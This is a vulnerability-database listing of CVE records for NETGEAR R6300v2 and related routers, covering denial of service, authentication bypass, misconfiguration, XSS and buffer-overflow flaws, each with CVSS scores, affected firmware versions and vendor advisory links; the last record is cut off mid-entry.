Vulnerabilites related to netgear - r6300
cve-2017-18765
Vulnerability from cvelistv5
Published
2020-04-22 15:41
Modified
2024-08-05 21:37
Severity ?
EPSS score ?
Summary
Certain NETGEAR devices are affected by denial of service. This affects R6300v2 before 1.0.4.8, R6400 before 1.0.1.22, R6400v2 before 1.0.2.32, R6700 before 1.0.1.20, R6900 before 1.0.1.20, WNR3500Lv2 before 1.2.0.44, and WNR2000v2 before 1.2.0.8.
References
| ▼ | URL | Tags |
|---|---|---|
| https://kb.netgear.com/000051480/Security-Advisory-for-Denial-of-Service-on-Some-Routers-PSV-2017-0648 | x_refsource_CONFIRM |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-05T21:37:44.370Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://kb.netgear.com/000051480/Security-Advisory-for-Denial-of-Service-on-Some-Routers-PSV-2017-0648"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Certain NETGEAR devices are affected by denial of service. This affects R6300v2 before 1.0.4.8, R6400 before 1.0.1.22, R6400v2 before 1.0.2.32, R6700 before 1.0.1.20, R6900 before 1.0.1.20, WNR3500Lv2 before 1.2.0.44, and WNR2000v2 before 1.2.0.8."
}
],
"metrics": [
{
"cvssV3_0": {
"attackComplexity": "LOW",
"attackVector": "ADJACENT_NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AC:L/AV:A/A:H/C:N/I:N/PR:N/S:U/UI:N",
"version": "3.0"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2020-04-22T15:41:12",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://kb.netgear.com/000051480/Security-Advisory-for-Denial-of-Service-on-Some-Routers-PSV-2017-0648"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2017-18765",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Certain NETGEAR devices are affected by denial of service. This affects R6300v2 before 1.0.4.8, R6400 before 1.0.1.22, R6400v2 before 1.0.2.32, R6700 before 1.0.1.20, R6900 before 1.0.1.20, WNR3500Lv2 before 1.2.0.44, and WNR2000v2 before 1.2.0.8."
}
]
},
"impact": {
"cvss": {
"attackComplexity": "LOW",
"attackVector": "ADJACENT",
"availabilityImpact": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AC:L/AV:A/A:H/C:N/I:N/PR:N/S:U/UI:N",
"version": "3.0"
}
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://kb.netgear.com/000051480/Security-Advisory-for-Denial-of-Service-on-Some-Routers-PSV-2017-0648",
"refsource": "CONFIRM",
"url": "https://kb.netgear.com/000051480/Security-Advisory-for-Denial-of-Service-on-Some-Routers-PSV-2017-0648"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2017-18765",
"datePublished": "2020-04-22T15:41:12",
"dateReserved": "2020-04-20T00:00:00",
"dateUpdated": "2024-08-05T21:37:44.370Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2017-18743
Vulnerability from cvelistv5
Published
2020-04-23 15:38
Modified
2024-08-05 21:37
Severity ?
EPSS score ?
Summary
Certain NETGEAR devices are affected by authentication bypass. This affects R6300v2 before 1.0.4.8, R6400 before 1.0.1.20, R6700 before 1.0.1.20, R6900 before 1.0.1.20, R7000 before 1.0.7.10, R7100LG before V1.0.0.32, R7300DST before 1.0.0.52, R7900 before 1.0.1.16, R8000 before 1.0.3.36, R8300 before 1.0.2.94, R8500 before 1.0.2.94, WNDR3400v3 before 1.0.1.12, and WNR3500Lv2 before 1.2.0.40.
References
| ▼ | URL | Tags |
|---|---|---|
| https://kb.netgear.com/000051512/Security-Advisory-for-Authentication-Bypass-on-Some-Routers-PSV-2017-0330 | x_refsource_CONFIRM |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-05T21:37:44.146Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://kb.netgear.com/000051512/Security-Advisory-for-Authentication-Bypass-on-Some-Routers-PSV-2017-0330"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Certain NETGEAR devices are affected by authentication bypass. This affects R6300v2 before 1.0.4.8, R6400 before 1.0.1.20, R6700 before 1.0.1.20, R6900 before 1.0.1.20, R7000 before 1.0.7.10, R7100LG before V1.0.0.32, R7300DST before 1.0.0.52, R7900 before 1.0.1.16, R8000 before 1.0.3.36, R8300 before 1.0.2.94, R8500 before 1.0.2.94, WNDR3400v3 before 1.0.1.12, and WNR3500Lv2 before 1.2.0.40."
}
],
"metrics": [
{
"cvssV3_0": {
"attackComplexity": "LOW",
"attackVector": "ADJACENT_NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AC:L/AV:A/A:H/C:H/I:H/PR:N/S:U/UI:N",
"version": "3.0"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2020-04-23T15:38:20",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://kb.netgear.com/000051512/Security-Advisory-for-Authentication-Bypass-on-Some-Routers-PSV-2017-0330"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2017-18743",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Certain NETGEAR devices are affected by authentication bypass. This affects R6300v2 before 1.0.4.8, R6400 before 1.0.1.20, R6700 before 1.0.1.20, R6900 before 1.0.1.20, R7000 before 1.0.7.10, R7100LG before V1.0.0.32, R7300DST before 1.0.0.52, R7900 before 1.0.1.16, R8000 before 1.0.3.36, R8300 before 1.0.2.94, R8500 before 1.0.2.94, WNDR3400v3 before 1.0.1.12, and WNR3500Lv2 before 1.2.0.40."
}
]
},
"impact": {
"cvss": {
"attackComplexity": "LOW",
"attackVector": "ADJACENT",
"availabilityImpact": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AC:L/AV:A/A:H/C:H/I:H/PR:N/S:U/UI:N",
"version": "3.0"
}
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://kb.netgear.com/000051512/Security-Advisory-for-Authentication-Bypass-on-Some-Routers-PSV-2017-0330",
"refsource": "CONFIRM",
"url": "https://kb.netgear.com/000051512/Security-Advisory-for-Authentication-Bypass-on-Some-Routers-PSV-2017-0330"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2017-18743",
"datePublished": "2020-04-23T15:38:20",
"dateReserved": "2020-04-20T00:00:00",
"dateUpdated": "2024-08-05T21:37:44.146Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2017-18756
Vulnerability from cvelistv5
Published
2020-04-22 16:10
Modified
2024-08-05 21:37
Severity ?
EPSS score ?
Summary
Certain NETGEAR devices are affected by incorrect configuration of security settings. This affects D6220 before 1.0.0.32, D6400 before 1.0.0.66, D8500 before 1.0.3.35, DGN2200Bv4 before 1.0.0.94, DGN2200v4 before 1.0.0.94, R6250 before 1.0.4.14, R6300v2 before 1.0.4.18, R6400 before 1.01.32, R6400v2 before 1.0.2.44, R6700 before 1.0.1.36, R6900 before 1.0.1.30, R6900P before 1.3.0.8, R7000 before 1.0.9.14, R7000P before 1.3.0.8, R7100LG before 1.0.0.34, R7900 before 1.0.2.4, R8000 before 1.0.4.2, WN2500RPv2 before 1.0.1.50, WNDR3400v3 before 1.0.1.14, and WNDR4000 before 1.0.2.10.
References
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-05T21:37:43.567Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://kb.netgear.com/000051492/Security-Advisory-for-Security-Misconfiguration-on-Some-Routers-Gateways-and-Extenders-PSV-2017-2756"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Certain NETGEAR devices are affected by incorrect configuration of security settings. This affects D6220 before 1.0.0.32, D6400 before 1.0.0.66, D8500 before 1.0.3.35, DGN2200Bv4 before 1.0.0.94, DGN2200v4 before 1.0.0.94, R6250 before 1.0.4.14, R6300v2 before 1.0.4.18, R6400 before 1.01.32, R6400v2 before 1.0.2.44, R6700 before 1.0.1.36, R6900 before 1.0.1.30, R6900P before 1.3.0.8, R7000 before 1.0.9.14, R7000P before 1.3.0.8, R7100LG before 1.0.0.34, R7900 before 1.0.2.4, R8000 before 1.0.4.2, WN2500RPv2 before 1.0.1.50, WNDR3400v3 before 1.0.1.14, and WNDR4000 before 1.0.2.10."
}
],
"metrics": [
{
"cvssV3_0": {
"attackComplexity": "LOW",
"attackVector": "ADJACENT_NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AC:L/AV:A/A:H/C:H/I:H/PR:N/S:U/UI:N",
"version": "3.0"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2020-04-22T16:10:39",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://kb.netgear.com/000051492/Security-Advisory-for-Security-Misconfiguration-on-Some-Routers-Gateways-and-Extenders-PSV-2017-2756"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2017-18756",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Certain NETGEAR devices are affected by incorrect configuration of security settings. This affects D6220 before 1.0.0.32, D6400 before 1.0.0.66, D8500 before 1.0.3.35, DGN2200Bv4 before 1.0.0.94, DGN2200v4 before 1.0.0.94, R6250 before 1.0.4.14, R6300v2 before 1.0.4.18, R6400 before 1.01.32, R6400v2 before 1.0.2.44, R6700 before 1.0.1.36, R6900 before 1.0.1.30, R6900P before 1.3.0.8, R7000 before 1.0.9.14, R7000P before 1.3.0.8, R7100LG before 1.0.0.34, R7900 before 1.0.2.4, R8000 before 1.0.4.2, WN2500RPv2 before 1.0.1.50, WNDR3400v3 before 1.0.1.14, and WNDR4000 before 1.0.2.10."
}
]
},
"impact": {
"cvss": {
"attackComplexity": "LOW",
"attackVector": "ADJACENT",
"availabilityImpact": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AC:L/AV:A/A:H/C:H/I:H/PR:N/S:U/UI:N",
"version": "3.0"
}
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://kb.netgear.com/000051492/Security-Advisory-for-Security-Misconfiguration-on-Some-Routers-Gateways-and-Extenders-PSV-2017-2756",
"refsource": "CONFIRM",
"url": "https://kb.netgear.com/000051492/Security-Advisory-for-Security-Misconfiguration-on-Some-Routers-Gateways-and-Extenders-PSV-2017-2756"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2017-18756",
"datePublished": "2020-04-22T16:10:39",
"dateReserved": "2020-04-20T00:00:00",
"dateUpdated": "2024-08-05T21:37:43.567Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2017-18785
Vulnerability from cvelistv5
Published
2020-04-22 14:23
Modified
2024-08-05 21:37
Severity ?
EPSS score ?
Summary
Certain NETGEAR devices are affected by XSS. This affects D3600 before 1.0.0.67, D6000 before 1.0.0.67, D6100 before 1.0.0.56, D6200 before 1.1.00.24, D6220 before 1.0.0.32, D6400 before 1.0.0.66, D7000 before 1.0.1.52, D7000v2 before 1.0.0.44, D7800 before 1.0.1.30, D8500 before 1.0.3.35, DGN2200v4 before 1.0.0.96, DGN2200Bv4 before 1.0.0.96, EX2700 before 1.0.1.28, EX6100v2 before 1.0.1.54, EX6150v2 before 1.0.1.54, EX6200v2 before 1.0.1.52, EX6400 before 1.0.1.72, EX7300 before 1.0.1.72, EX8000 before 1.0.0.102, JNR1010v2 before 1.1.0.44, JWNR2010v5 before 1.1.0.44, PR2000 before 1.0.0.20, R6020 before 1.0.0.26, R6080 before 1.0.0.26, R6100 before 1.0.1.20, R6250 before 1.0.4.16, R6300v2 before 1.0.4.18, R6400 before 1.0.1.32, R6400v2 before 1.0.2.46, R6700 before 1.0.1.36, R6800 before 1.2.0.12, R6900v2 before 1.2.0.12, R6700v2 before 1.2.0.12, R6900 before 1.0.1.34, R6900P before 1.3.0.8, R7000 before 1.0.9.18, R7000P before 1.3.0.8, R7100LG before 1.0.0.34, R7300DST before 1.0.0.58, R7500 before 1.0.0.118, R7500v2 before 1.0.3.24, R7800 before 1.0.2.40, R7900 before 1.0.2.4, R7900P before 1.1.5.14, R8000 before 1.0.4.4, R8000P before 1.1.5.14, R8500 before 1.0.2.110, R8300 before 1.0.2.110, R9000 before 1.0.2.52, WN2000RPTv3 before 1.0.1.8, WN3000RPv3 before 1.0.2.50, WN3100RPv2 before 1.0.0.42, WNDR3400v3 before 1.0.1.16, WNDR3700v4 before 1.0.2.94, WNDR4300 before 1.0.2.96, WNDR4300v2 before 1.0.0.50, WNDR4500v3 before 1.0.0.50, WNR1000v4 before 1.1.0.44, WNR2000v5 before 1.0.0.62, WNR2020 before 1.1.0.44, WNR2050 before 1.1.0.44, and WNR3500Lv2 before 1.2.0.46.
References
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-05T21:37:44.208Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://kb.netgear.com/000049534/Security-Advisory-for-Cross-Site-Scripting-on-Some-Routers-Gateways-and-Extenders-PSV-2017-2950"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Certain NETGEAR devices are affected by XSS. This affects D3600 before 1.0.0.67, D6000 before 1.0.0.67, D6100 before 1.0.0.56, D6200 before 1.1.00.24, D6220 before 1.0.0.32, D6400 before 1.0.0.66, D7000 before 1.0.1.52, D7000v2 before 1.0.0.44, D7800 before 1.0.1.30, D8500 before 1.0.3.35, DGN2200v4 before 1.0.0.96, DGN2200Bv4 before 1.0.0.96, EX2700 before 1.0.1.28, EX6100v2 before 1.0.1.54, EX6150v2 before 1.0.1.54, EX6200v2 before 1.0.1.52, EX6400 before 1.0.1.72, EX7300 before 1.0.1.72, EX8000 before 1.0.0.102, JNR1010v2 before 1.1.0.44, JWNR2010v5 before 1.1.0.44, PR2000 before 1.0.0.20, R6020 before 1.0.0.26, R6080 before 1.0.0.26, R6100 before 1.0.1.20, R6250 before 1.0.4.16, R6300v2 before 1.0.4.18, R6400 before 1.0.1.32, R6400v2 before 1.0.2.46, R6700 before 1.0.1.36, R6800 before 1.2.0.12, R6900v2 before 1.2.0.12, R6700v2 before 1.2.0.12, R6900 before 1.0.1.34, R6900P before 1.3.0.8, R7000 before 1.0.9.18, R7000P before 1.3.0.8, R7100LG before 1.0.0.34, R7300DST before 1.0.0.58, R7500 before 1.0.0.118, R7500v2 before 1.0.3.24, R7800 before 1.0.2.40, R7900 before 1.0.2.4, R7900P before 1.1.5.14, R8000 before 1.0.4.4, R8000P before 1.1.5.14, R8500 before 1.0.2.110, R8300 before 1.0.2.110, R9000 before 1.0.2.52, WN2000RPTv3 before 1.0.1.8, WN3000RPv3 before 1.0.2.50, WN3100RPv2 before 1.0.0.42, WNDR3400v3 before 1.0.1.16, WNDR3700v4 before 1.0.2.94, WNDR4300 before 1.0.2.96, WNDR4300v2 before 1.0.0.50, WNDR4500v3 before 1.0.0.50, WNR1000v4 before 1.1.0.44, WNR2000v5 before 1.0.0.62, WNR2020 before 1.1.0.44, WNR2050 before 1.1.0.44, and WNR3500Lv2 before 1.2.0.46."
}
],
"metrics": [
{
"cvssV3_0": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "NONE",
"baseScore": 4.2,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "HIGH",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.0/AC:L/AV:L/A:N/C:L/I:L/PR:H/S:C/UI:R",
"version": "3.0"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2020-04-22T14:23:04",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://kb.netgear.com/000049534/Security-Advisory-for-Cross-Site-Scripting-on-Some-Routers-Gateways-and-Extenders-PSV-2017-2950"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2017-18785",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Certain NETGEAR devices are affected by XSS. This affects D3600 before 1.0.0.67, D6000 before 1.0.0.67, D6100 before 1.0.0.56, D6200 before 1.1.00.24, D6220 before 1.0.0.32, D6400 before 1.0.0.66, D7000 before 1.0.1.52, D7000v2 before 1.0.0.44, D7800 before 1.0.1.30, D8500 before 1.0.3.35, DGN2200v4 before 1.0.0.96, DGN2200Bv4 before 1.0.0.96, EX2700 before 1.0.1.28, EX6100v2 before 1.0.1.54, EX6150v2 before 1.0.1.54, EX6200v2 before 1.0.1.52, EX6400 before 1.0.1.72, EX7300 before 1.0.1.72, EX8000 before 1.0.0.102, JNR1010v2 before 1.1.0.44, JWNR2010v5 before 1.1.0.44, PR2000 before 1.0.0.20, R6020 before 1.0.0.26, R6080 before 1.0.0.26, R6100 before 1.0.1.20, R6250 before 1.0.4.16, R6300v2 before 1.0.4.18, R6400 before 1.0.1.32, R6400v2 before 1.0.2.46, R6700 before 1.0.1.36, R6800 before 1.2.0.12, R6900v2 before 1.2.0.12, R6700v2 before 1.2.0.12, R6900 before 1.0.1.34, R6900P before 1.3.0.8, R7000 before 1.0.9.18, R7000P before 1.3.0.8, R7100LG before 1.0.0.34, R7300DST before 1.0.0.58, R7500 before 1.0.0.118, R7500v2 before 1.0.3.24, R7800 before 1.0.2.40, R7900 before 1.0.2.4, R7900P before 1.1.5.14, R8000 before 1.0.4.4, R8000P before 1.1.5.14, R8500 before 1.0.2.110, R8300 before 1.0.2.110, R9000 before 1.0.2.52, WN2000RPTv3 before 1.0.1.8, WN3000RPv3 before 1.0.2.50, WN3100RPv2 before 1.0.0.42, WNDR3400v3 before 1.0.1.16, WNDR3700v4 before 1.0.2.94, WNDR4300 before 1.0.2.96, WNDR4300v2 before 1.0.0.50, WNDR4500v3 before 1.0.0.50, WNR1000v4 before 1.1.0.44, WNR2000v5 before 1.0.0.62, WNR2020 before 1.1.0.44, WNR2050 before 1.1.0.44, and WNR3500Lv2 before 1.2.0.46."
}
]
},
"impact": {
"cvss": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "NONE",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "HIGH",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.0/AC:L/AV:L/A:N/C:L/I:L/PR:H/S:C/UI:R",
"version": "3.0"
}
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://kb.netgear.com/000049534/Security-Advisory-for-Cross-Site-Scripting-on-Some-Routers-Gateways-and-Extenders-PSV-2017-2950",
"refsource": "CONFIRM",
"url": "https://kb.netgear.com/000049534/Security-Advisory-for-Cross-Site-Scripting-on-Some-Routers-Gateways-and-Extenders-PSV-2017-2950"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2017-18785",
"datePublished": "2020-04-22T14:23:04",
"dateReserved": "2020-04-20T00:00:00",
"dateUpdated": "2024-08-05T21:37:44.208Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2019-20755
Vulnerability from cvelistv5
Published
2020-04-16 21:08
Modified
2024-08-05 02:53
Severity ?
EPSS score ?
Summary
Certain NETGEAR devices are affected by a stack-based buffer overflow by an authenticated user. This affects D6220 before 1.0.0.46, D6400 before 1.0.0.80, D7000v2 before 1.0.0.51, D8500 before 1.0.3.42, DGN2200v1 before 1.0.0.58, DGN2200B before 1.0.0.58, JNDR3000 before 1.0.0.24, RBW30 before 2.1.4.16, R6250 before 1.0.4.26, R6300v2 before 1.0.4.28, R6400 before 1.0.1.42, R6400v2 before 1.0.2.56, R6700 before 1.0.1.46, R6900 before 1.0.1.46, R7000 before 1.0.9.32, R6900P before 1.3.1.44, R7100LG before 1.0.0.46, R7300DST before 1.0.0.68, R7000P before 1.3.1.44, R7900 before 1.0.2.16, R8000P before 1.4.0.10, R7900P before 1.4.0.10, R8300 before 1.0.2.122, R8500 before 1.0.2.122, R8000 before 1.0.4.18, WNDR3400v3 before 1.0.1.22, WNDR4500v2 before 1.0.0.72, WNR3500Lv2 before 1.2.0.54, WN3100RP before 1.0.0.20, and WN2500RPv2 before 1.0.1.54.
References
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-05T02:53:09.159Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://kb.netgear.com/000060627/Security-Advisory-for-Post-Authentication-Stack-Overflow-on-Some-Routers-Modem-Routers-Extenders-and-Orbi-Satellites-PSV-2018-0053"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Certain NETGEAR devices are affected by a stack-based buffer overflow by an authenticated user. This affects D6220 before 1.0.0.46, D6400 before 1.0.0.80, D7000v2 before 1.0.0.51, D8500 before 1.0.3.42, DGN2200v1 before 1.0.0.58, DGN2200B before 1.0.0.58, JNDR3000 before 1.0.0.24, RBW30 before 2.1.4.16, R6250 before 1.0.4.26, R6300v2 before 1.0.4.28, R6400 before 1.0.1.42, R6400v2 before 1.0.2.56, R6700 before 1.0.1.46, R6900 before 1.0.1.46, R7000 before 1.0.9.32, R6900P before 1.3.1.44, R7100LG before 1.0.0.46, R7300DST before 1.0.0.68, R7000P before 1.3.1.44, R7900 before 1.0.2.16, R8000P before 1.4.0.10, R7900P before 1.4.0.10, R8300 before 1.0.2.122, R8500 before 1.0.2.122, R8000 before 1.0.4.18, WNDR3400v3 before 1.0.1.22, WNDR4500v2 before 1.0.0.72, WNR3500Lv2 before 1.2.0.54, WN3100RP before 1.0.0.20, and WN2500RPv2 before 1.0.1.54."
}
],
"metrics": [
{
"cvssV3_0": {
"attackComplexity": "LOW",
"attackVector": "ADJACENT_NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 6.8,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AC:L/AV:A/A:H/C:H/I:H/PR:H/S:U/UI:N",
"version": "3.0"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2020-04-16T21:08:03",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://kb.netgear.com/000060627/Security-Advisory-for-Post-Authentication-Stack-Overflow-on-Some-Routers-Modem-Routers-Extenders-and-Orbi-Satellites-PSV-2018-0053"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2019-20755",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Certain NETGEAR devices are affected by a stack-based buffer overflow by an authenticated user. This affects D6220 before 1.0.0.46, D6400 before 1.0.0.80, D7000v2 before 1.0.0.51, D8500 before 1.0.3.42, DGN2200v1 before 1.0.0.58, DGN2200B before 1.0.0.58, JNDR3000 before 1.0.0.24, RBW30 before 2.1.4.16, R6250 before 1.0.4.26, R6300v2 before 1.0.4.28, R6400 before 1.0.1.42, R6400v2 before 1.0.2.56, R6700 before 1.0.1.46, R6900 before 1.0.1.46, R7000 before 1.0.9.32, R6900P before 1.3.1.44, R7100LG before 1.0.0.46, R7300DST before 1.0.0.68, R7000P before 1.3.1.44, R7900 before 1.0.2.16, R8000P before 1.4.0.10, R7900P before 1.4.0.10, R8300 before 1.0.2.122, R8500 before 1.0.2.122, R8000 before 1.0.4.18, WNDR3400v3 before 1.0.1.22, WNDR4500v2 before 1.0.0.72, WNR3500Lv2 before 1.2.0.54, WN3100RP before 1.0.0.20, and WN2500RPv2 before 1.0.1.54."
}
]
},
"impact": {
"cvss": {
"attackComplexity": "LOW",
"attackVector": "ADJACENT",
"availabilityImpact": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"userInteraction": "NONE",
